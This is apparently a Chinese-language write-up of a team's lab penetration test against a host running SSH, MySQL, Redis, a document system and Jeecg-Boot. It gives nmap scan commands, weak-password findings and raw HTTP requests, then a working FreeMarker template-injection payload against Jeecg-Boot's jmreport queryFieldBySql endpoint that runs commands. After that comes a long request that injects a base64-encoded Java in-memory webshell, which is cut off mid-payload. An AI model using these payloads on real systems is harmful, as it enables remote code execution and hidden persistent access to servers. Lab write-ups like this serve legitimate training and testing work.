无限学习团队月靶场

信息收集

namp：
--min-rate 10000    10000速率来扫描
-p-   全端口
-p80,135    指定80，135端口扫描
-sU   指定udp扫描
-sT   指定tcp协议
-sV   扫描服务版本
-sC   默认脚本扫描
-O    对操作系统和版本探测
--script=vuln   进行基础漏洞扫描


nmap -p-  --min-rate 10000  192.168.111.22
nmap -p- -sU --min-rate 10000  192.168.111.22
nmap -p22,3306,6379,18088,18080 --script=vuln 192.168.111.22
nmap -p22,3306,6379,18088,18080 -sV -sC -sT -O 192.168.111.22

根据扫描结果开放端口为 SSH（22）、MySQL（3306）、Redis（6379）、Apache Tomcat 404（18088）、http（18080）

漏洞探测

爆破 SSH（22）、MySQL（3306）、Redis（6379）

MySQL弱口令

192.168.111.22:3306 root/root

Redis未授权访问

192.168.111.22:6379

http://192.168.111.22:18088/ 访问 404 扫扫目录

Web 系统

http://192.168.111.22:18088/jeecg-boot/jmreport/list

http://192.168.111.22:18080/

漏洞利用

MySQL RCE(失败)

关于 mysql 知识点可以参考国光的MySQL 漏洞利用与提权

失效访问MySQL 漏洞利用与提权(转载)

show global variables like '%secure_file_priv%';

Value	说明
NULL	不允许导入或导出
/tmp	只允许在 /tmp 目录导入导出
空	不限制目录

Redis RCE(失败)

这里直接用GitHub - DeEpinGh0st/MDUT-Extend-Release: MDUT-Extend(扩展版本)比较方便

知识点：Redis未授权利用总结

DocToolkit 系统 RCE(失败)

http://192.168.111.22:18080/

尝试上传，文件读取皆失败，存在弱口令但是页面未开发

弱口令

POST /admin/doLogin HTTP/1.1
Host: 192.168.111.22:18080
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Cookie: Hm_lvt_5819d05c0869771ff6e6a81cdec5b2e8=1758269454,1758270382
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

username=admin&password=123456

登录时发现存在Shiro 框架，爆破密钥失败

Jeecg-Boot 系统RCE(成功)

http://192.168.111.22:18088/jeecg-boot/jmreport/list

直接打 nday，因为这里的任意文件上传上传后需要登录，所以选择 SSTI 模板注入

GitHub - MInggongK/jeecg-: jeecg综合漏洞利用工具

queryFieldBySql SSTI模板注入

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.111.22:18088
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Cookie: Hm_lvt_5819d05c0869771ff6e6a81cdec5b2e8=1758269454,1758270382
Connection: keep-alive
Content-Type: application/json
Content-Length: 99

{"sql":"select '<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ ex(\"whoami \") }' "}

内存马GitHub - pen4uin/java-memshell-generator: 一款支持自定义的 Java 内存马生成工具｜A customizable Java in-memory webshell generation tool.

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.111.22:18088
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Cookie: Hm_lvt_5819d05c0869771ff6e6a81cdec5b2e8=1758269454,1758270382
Connection: keep-alive
Content-Type: application/json
Content-Length: 16172

{"sql":"call${\"freemarker.template.utility.ObjectConstructor\"?new()(\"javax.script.ScriptEngineManager\").getEngineByName(\"js\").eval(\"classLoader=java.lang.Thread.currentThread().getContextClassLoader();try{classLoader.loadClass('org.apachen.SOAPUtils').newInstance();}catch(e){clsString=classLoader.loadClass('java.lang.String');bytecodeBase64='yv66vgAAADEBewEAIGNoL3Fvcy9sb2diYWNrL3UvRW5jcnlwdGlvblV0aWxzBwABAQAQamF2YS9sYW5nL09iamVjdAcAAwEADGdldENsYXNzTmFtZQEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAEQ29kZQEAKGNoLnFvcy5sb2diYWNrLldoaXRlQmxhY2tMaXN0WHdlTGlzdGVuZXIIAAgBAA9nZXRCYXNlNjRTdHJpbmcBAApFeGNlcHRpb25zAQATamF2YS9pby9JT0V4Y2VwdGlvbgcADAEAEGphdmEvbGFuZy9TdHJpbmcHAA4BCpRINHNJQUFBQUFBQUFBSTFYK1hjVDF4WCtualh5eUxJSVFjUUdRVXZaUWlSWnNnSUJZdVJBc0kwZE81RUV3U3d4VHBleE5MWUVzbVJtUm1aSjI2UnQwalVwVFhlNnBrdnFMbWtMS2NnUUNpRnRDcWM1UGFmTkQvMG4rZy8wOUljMi9kNk1iRWxlT1FmbWpkNjc5M3YzZmZlNzk0M2YrOTlidHdCc3gxMkJZRG9iTzEwMFkvbmkySWlXUGhVN25zMVplbmVlcjRtY2FUMXpScGVEWHRBTkZVTGcvcFBhcEJiTGE0V3gyTUdSazNyYVV1RVMyQ3BuejhaTTNaak02MVpzMEJrUDY2ZEx1bWxWL2QwQ2pZL2xDamxybjRBckdEb21vUFFVTTdyQXlrU3VvS2RLNHlPNmNVUWJ5WFBHbnlpbXRmd3h6Y2pKMzVWSnhjcm1USUZ3NGw1RDd2UkJoY2NMQmZjeGRNT0o1d0QvRzhWemVrWmdXekN4Vk9TOWszckI2cFJ4cmpibkx3aHN1UWR2SHFXeTd3QVBudFB5dWZOeTU5VlZIbnZQcHZVSksxY3NxR2poR1RPYXBRazBESGNMTktmem1ta21pbHBHTndRQzltNnhBamM2ZWpqUlUxM2lIbzNqdXBVdEVuZGRvZ3BzNktONVppaVd0TmRvNVNiZStmTUNxMnFNYkJ5dXVkSjVVOUplWFJtMGpGeGhqRXNlUXpjbmlnV1RHWmpMVjlheUptTDlmTXdlM2JHa2wxbzV0c0JEeXpyWmh2VFp0Q3lmS2g0VWVQQ2U4RlE4eEF6Zlc3d3FRblhhZHM2dW9rMWd4YUJGWVNXMWlZb0lWNDNwVnYxR0FodURvU1dsUUIyMkkrYkZOandzMERwVzNiZlBLSTdQb2p5OVBMc08ydHpORnMyQ0R6dndpQmNOMkNuZ3plcFNMQ2x0WFBkaE56WTJjZnBSZ1NaRzA2ODdDcXVVUTEzNlEvT25mTmlEZURPQ1lNYWFIZFJqV3I1RTJMME9MTXZia3k0V0xDMVhvS2JXMTZMMlpEVmpVQjZqa05ZN1F5ZDgySTh1THlLZzJwVUpLdEdIQXc1R3I0Q1BvUjNTREFaczZZWVBUemliOW5OaFJEUDEzVHNQNkdtN2U3UXVGUFp3dHc5UDRpbDUrSVRBbWtWS1IwV0tjTFdMS2c3VktlRkkxdUFKVlJ5bUV0SWx3NkFHblNtQkI0SzE1RGl6Sk9jSWpub3hDSGFORmg2Z2h6em9aNjJldWtxdWM2eXRaQitld1pEMFBpRVFDZzdYVlh6bklqNmhZN0xMUGV2RlFYeVVleTVvcE9ManpGVkdIMldmdGFjOVlKTlpPY2RXUlZyRldrcThPai9BNk1lay95Z1RkR1RvVUs4UFdXeG93aGh5VGlrd0NYbk4wRFBKU2dQYXYwQXlodWYxbTlEaWJjcUhVOGg3a2NHNHdOckZyRlFVbVE5VHQ3clNhZDAwYzg3MUVEd2h1VGdOdzRzSm1ISml3Q0duNUdYQWsyeVR1Y0prOFJSTjk5Ukc2VnhrZFZGV3BrTHpwM3c0aTNNU24zMjB1YUNmR1NpWWxrWXh6NVhEclBrbjhTbDVtazl6ZCtwZWsxMjJaWUhkWlMyOGdNL0l1K3F6UkI3Tmw4eHNkMmwwVkNyL1JYaWFFY1pMTE9MWnk0SVozTUtPemd6MFVXa2RDeUF1WGN1ejhYMEpYNVpGOGhVUE5nbHNxQnFraW9PbGRMWXZwK2N6TlRmVVY4bnFwR2JzWXM5TExHM2I2VmcrWEgrcFZMWjExclk3dzQ3WnU2MHUwelpjeGZLUm1SS2ViNkhpdTJ3M3N0S2tzbml6emk4dW52SjcrTDZrOWdlczdSclIyZ0FDMFdYNlhuMUVQdndJUDVZcGZZMFNsSmRCYVVJMzdKdmFoNS9LYlRMNDJad2N6MkRhWW56ZGl3djRoUmNYcFVSZEJKalRlSmZTM3Evd2ErbjRHMTZ2R2J2N3NadTAxQmpXc3UvaVp3NmJvMWtxdEkvbnpIUjdkOWRnNzB6VE5EeTRSSXpSb24wZjhFWmRob0VaR3QvRUgrVDVyckJwT3ZzN0V2V2c3TndrVG5YNmNNMHA0ZXVWVnRwZXNuTDU5bTY3YTN0d2d6cDJrdUJFY3BPbDRhQjU4TGI4eXVNZDU4RTd0RHJLR3k3YU5jYWU2OEdmYWRXZHpZMXJaeno0Q3paUnNnbzRCUmVmdkRQNE9Tdmt0V2FQZSsyeGtXLzgvT096aWIrNjZDRTRyZ2xQWTJYWS82ZXI2QXY3MzcyS2pyRC96bFU4ZnBsTERmQlczQUFmbXUybjdjSnhoUTE4UDFaVjRIYlo5cHliNitpM0hWdWR4WXFqZlBOak5aOXNFek1RNGwzR0pxSGVieXRqKzIwRWsrSElOSGFsSXVFcjZMaU94eHB3QjFlcVAvanllQms5Ri9HYW5PdTdqb0VHeEpXQWNnY1h3Z0dsakdUY2ZRTUhoMXczOGZRMUhDOWplQm9maXpmNlArRWZhYnlKekpETHJ3OE9LVy9pNU9DUVd6N0xLTVRWZ0VwSEs2QUdHbW1qRExrQ2J0cmN3TmlRYXhwbmFDaGZBKzViOGtjWno5MUdKdTRKZU1wNDNtMWJSMmdjNWNMbmprZXY0L01DVTNESDNWTlFVcGQ1K1AyNGkvZElnd2Qvdzk4NXVteUsrbmg0b0lXemEzQWYxaUtHQURxeGp0WWZRajgrakdGc3dEbDhCTTh6Z1c4d3llOWdNM0cyRW1rTGNVSkVDdUlmYklXUzRtZEpYajh0MXhESFRjODhzZFl4Q2VlUXducmlxVVJZVDh3TjNLMFRyeEoxby94REFMZUl1NW54a1BqWjlMeGZTWThIZitWT1d4bC9sTE5ib0h6QXJkMHFHbFJzVXhGVUVWYjVzU0pVdFA0SG9wdUR6RDIvc2ZqOEFoMmtJbHZ0blBaenhzMHhJcEp0L2k5ZXc4ditWL2k0alhCeUNvRlVXODB2VDF5Wmdvdi9JcGZvMDBDQ0hpQkdDOFBkTE9GNVdIWm96a3ZVZnpKc2lkb2hrdUV5ZnBpSytwWFgwUnFsZm41Q3BCVnhKVnJHejFOVEgvd3JjaGUrRzdndzFEYU5xYmNqVFBJdkkzUjQ0eExqVzhHRHRySURPUW5aUVFya0g0THlGQ3AyY25VMzF4K2xSUWRwM1VQNjRxUnRMeW5aUjByMjA2ckxKbjhuNDVDMGY0M0VLaklpZkIzZnNLbnN3RGZwd2I5Z2lQUXRmSnVqU3Z6dk1BMHVtOVJWVVA0TFZjVkZGWm1VaWd0TnZocnFoUHhtcXh6MjM4eWxQS3pwdjN3TlY1TVIvN1RpQ0RsQ3piMFZvUXdWVzRadGpqWjE1OStscFArUE5DYzF0MWdLR1ZvS2ptVGdPVmtzSk0xL3V4WW1vQ3dJWWxkeWxCL3RNOEtWd2dJL1FSdVoyWFlNVUxoUHNnVTh4YmVFemNjK3JqUlNuRkp1RFZ6Wlo3KzV1QjdHYjhtTVFvOERaT3QzZGw4d1o0Vm40dmMyVzFHbmZ4U2twS3AwNFAvcnNZUXdxUThBQUE9PQgAEAEABjxpbml0PgEAFShMamF2YS9sYW5nL1N0cmluZzspVgwAEgATCgAPABQBAAMoKVYBABNqYXZhL2xhbmcvRXhjZXB0aW9uBwAXAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAIbGlzdGVuZXIBABJMamF2YS9sYW5nL09iamVjdDsBAAdjb250ZXh0AQAIY29udGV4dHMBABBMamF2YS91dGlsL0xpc3Q7AQAEdGhpcwEAIkxjaC9xb3MvbG9nYmFjay91L0VuY3J5cHRpb25VdGlsczsBABZMb2NhbFZhcmlhYmxlVHlwZVRhYmxlAQAkTGphdmEvdXRpbC9MaXN0PExqYXZhL2xhbmcvT2JqZWN0Oz47AQAOamF2YS91dGlsL0xpc3QHACQBABJqYXZhL3V0aWwvSXRlcmF0b3IHACYBAA1TdGFja01hcFRhYmxlDAASABYKAAQAKQEACmdldENvbnRleHQBABIoKUxqYXZhL3V0aWwvTGlzdDsMACsALAoAAgAtAQAIaXRlcmF0b3IBABYoKUxqYXZhL3V0aWwvSXRlcmF0b3I7DAAvADALACUAMQEAB2hhc05leHQBAAMoKVoMADMANAsAJwA1AQAEbmV4dAEAFCgpTGphdmEvbGFuZy9PYmplY3Q7DAA3ADgLACcAOQEAC2dldExpc3RlbmVyAQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsMADsAPAoAAgA9AQALYWRkTGlzdGVuZXIBACcoTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9PYmplY3Q7KVYMAD8AQAoAAgBBAQAEa2V5MQEACGNoaWxkcmVuAQATTGphdmEvdXRpbC9IYXNoTWFwOwEAA2tleQEAC2NoaWxkcmVuTWFwAQAGdGhyZWFkAQASTGphdmEvbGFuZy9UaHJlYWQ7AQABZQEAFUxqYXZhL2xhbmcvRXhjZXB0aW9uOwEAB3RocmVhZHMBABNbTGphdmEvbGFuZy9UaHJlYWQ7BwBNAQAQamF2YS9sYW5nL1RocmVhZAcATwEAEWphdmEvdXRpbC9IYXNoTWFwBwBRAQATamF2YS91dGlsL0FycmF5TGlzdAcAUwoAVAApAQAKZ2V0VGhyZWFkcwgAVgEADGludm9rZU1ldGhvZAEAOChMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9PYmplY3Q7DABYAFkKAAIAWgEAB2dldE5hbWUMAFwABgoAUABdAQAcQ29udGFpbmVyQmFja2dyb3VuZFByb2Nlc3NvcggAXwEACGNvbnRhaW5zAQAbKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlOylaDABhAGIKAA8AYwEABnRhcmdldAgAZQEABWdldEZWDABnAFkKAAIAaAEABnRoaXMkMAgAaggARAEABmtleVNldAEAESgpTGphdmEvdXRpbC9TZXQ7DABtAG4KAFIAbwEADWphdmEvdXRpbC9TZXQHAHELAHIAMQEAA2dldAwAdAA8CgBSAHUBAAhnZXRDbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsMAHcAeAoABAB5AQAPamF2YS9sYW5nL0NsYXNzBwB7CgB8AF0BAA9TdGFuZGFyZENvbnRleHQIAH4BAANhZGQBABUoTGphdmEvbGFuZy9PYmplY3Q7KVoMAIAAgQsAJQCCAQAVVG9tY2F0RW1iZWRkZWRDb250ZXh0CACEAQAVZ2V0Q29udGV4dENsYXNzTG9hZGVyAQAZKClMamF2YS9sYW5nL0NsYXNzTG9hZGVyOwwAhgCHCgBQAIgBAAh0b1N0cmluZwwAigAGCgB8AIsBABlQYXJhbGxlbFdlYmFwcENsYXNzTG9hZGVyCACNAQAfVG9tY2F0RW1iZWRkZWRXZWJhcHBDbGFzc0xvYWRlcggAjwEACXJlc291cmNlcwgAkQgAHQEAGmphdmEvbGFuZy9SdW50aW1lRXhjZXB0aW9uBwCUAQAYKExqYXZhL2xhbmcvVGhyb3dhYmxlOylWDAASAJYKAJUAlwEAIGphdmEvbGFuZy9JbGxlZ2FsQWNjZXNzRXhjZXB0aW9uBwCZAQAfamF2YS9sYW5nL05vU3VjaE1ldGhvZEV4Y2VwdGlvbgcAmwEAK2phdmEvbGFuZy9yZWZsZWN0L0ludm9jYXRpb25UYXJnZXRFeGNlcHRpb24HAJ0BAAlTaWduYXR1cmUBACYoKUxqYXZhL3V0aWwvTGlzdDxMamF2YS9sYW5nL09iamVjdDs+OwEAE2phdmEvbGFuZy9UaHJvd2FibGUHAKEBAAljbGF6ekJ5dGUBAAJbQgEAC2RlZmluZUNsYXNzAQAaTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAAVjbGF6egEAEUxqYXZhL2xhbmcvQ2xhc3M7AQALY2xhc3NMb2FkZXIBABdMamF2YS9sYW5nL0NsYXNzTG9hZGVyOwEAFWphdmEvbGFuZy9DbGFzc0xvYWRlcgcAqwEADWN1cnJlbnRUaHJlYWQBABQoKUxqYXZhL2xhbmcvVGhyZWFkOwwArQCuCgBQAK8BAA5nZXRDbGFzc0xvYWRlcgwAsQCHCgB8ALIMAAUABgoAAgC0AQAJbG9hZENsYXNzAQAlKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL0NsYXNzOwwAtgC3CgCsALgBAAtuZXdJbnN0YW5jZQwAugA4CgB8ALsMAAoABgoAAgC9AQAMZGVjb2RlQmFzZTY0AQAWKExqYXZhL2xhbmcvU3RyaW5nOylbQgwAvwDACgACAMEBAA5nemlwRGVjb21wcmVzcwEABihbQilbQgwAwwDECgACAMUIAKUHAKQBABFqYXZhL2xhbmcvSW50ZWdlcgcAyQEABFRZUEUMAMsAqAkAygDMAQARZ2V0RGVjbGFyZWRNZXRob2QBAEAoTGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7DADOAM8KAHwA0AEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAcA0gEADXNldEFjY2Vzc2libGUBAAQoWilWDADUANUKANMA1gEAB3ZhbHVlT2YBABYoSSlMamF2YS9sYW5nL0ludGVnZXI7DADYANkKAMoA2gEABmludm9rZQEAOShMamF2YS9sYW5nL09iamVjdDtbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwwA3ADdCgDTAN4BAAdvYmplY3RzAQATW0xqYXZhL2xhbmcvT2JqZWN0OwEACWxpc3RlbmVycwEACWFycmF5TGlzdAEAFUxqYXZhL3V0aWwvQXJyYXlMaXN0OwEACmlzSW5qZWN0ZWQBACcoTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9TdHJpbmc7KVoMAOUA5goAAgDnAQAbYWRkQXBwbGljYXRpb25FdmVudExpc3RlbmVyCADpAQBdKExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzO1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7DABYAOsKAAIA7AEAHGdldEFwcGxpY2F0aW9uRXZlbnRMaXN0ZW5lcnMIAO4HAOEBABBqYXZhL3V0aWwvQXJyYXlzBwDxAQAGYXNMaXN0AQAlKFtMamF2YS9sYW5nL09iamVjdDspTGphdmEvdXRpbC9MaXN0OwwA8wD0CgDyAPUBABkoTGphdmEvdXRpbC9Db2xsZWN0aW9uOylWDAASAPcKAFQA+AoAVACCAQAcc2V0QXBwbGljYXRpb25FdmVudExpc3RlbmVycwgA+wEAB3RvQXJyYXkBABUoKVtMamF2YS9sYW5nL09iamVjdDsMAP0A/goAVAD/AQABaQEAAUkBAA1ldmlsQ2xhc3NOYW1lAQASTGphdmEvbGFuZy9TdHJpbmc7AQAEc2l6ZQEAAygpSQwBBQEGCgBUAQcBABUoSSlMamF2YS9sYW5nL09iamVjdDsMAHQBCQoAVAEKAQAMZGVjb2RlckNsYXNzAQAHZGVjb2RlcgEAB2lnbm9yZWQBAAliYXNlNjRTdHIBABRMamF2YS9sYW5nL0NsYXNzPCo+OwEAFnN1bi5taXNjLkJBU0U2NERlY29kZXIIAREBAAdmb3JOYW1lDAETALcKAHwBFAEADGRlY29kZUJ1ZmZlcggBFgEACWdldE1ldGhvZAwBGADPCgB8ARkBABBqYXZhLnV0aWwuQmFzZTY0CAEbAQAKZ2V0RGVjb2RlcggBHQEABmRlY29kZQgBHwEAIGphdmEvbGFuZy9DbGFzc05vdEZvdW5kRXhjZXB0aW9uBwEhAQAOY29tcHJlc3NlZERhdGEBAANvdXQBAB9MamF2YS9pby9CeXRlQXJyYXlPdXRwdXRTdHJlYW07AQACaW4BAB5MamF2YS9pby9CeXRlQXJyYXlJbnB1dFN0cmVhbTsBAAZ1bmd6aXABAB9MamF2YS91dGlsL3ppcC9HWklQSW5wdXRTdHJlYW07AQAGYnVmZmVyAQABbgEAHWphdmEvaW8vQnl0ZUFycmF5T3V0cHV0U3RyZWFtBwEsAQAcamF2YS9pby9CeXRlQXJyYXlJbnB1dFN0cmVhbQcBLgEAHWphdmEvdXRpbC96aXAvR1pJUElucHV0U3RyZWFtBwEwCgEtACkBAAUoW0IpVgwAEgEzCgEvATQBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYMABIBNgoBMQE3AQAEcmVhZAEABShbQilJDAE5AToKATEBOwEABXdyaXRlAQAHKFtCSUkpVgwBPQE+CgEtAT8BAAt0b0J5dGVBcnJheQEABCgpW0IMAUEBQgoBLQFDAQADb2JqAQAJZmllbGROYW1lAQAFZmllbGQBABlMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAEZ2V0RgEAPyhMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwwBSQFKCgACAUsBABdqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZAcBTQoBTgDWCgFOAHUBAB5qYXZhL2xhbmcvTm9TdWNoRmllbGRFeGNlcHRpb24HAVEBACBMamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uOwEAEGdldERlY2xhcmVkRmllbGQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsMAVQBVQoAfAFWAQANZ2V0U3VwZXJjbGFzcwwBWAB4CgB8AVkKAVIAFAEADHRhcmdldE9iamVjdAEACm1ldGhvZE5hbWUBAAdtZXRob2RzAQAbW0xqYXZhL2xhbmcvcmVmbGVjdC9NZXRo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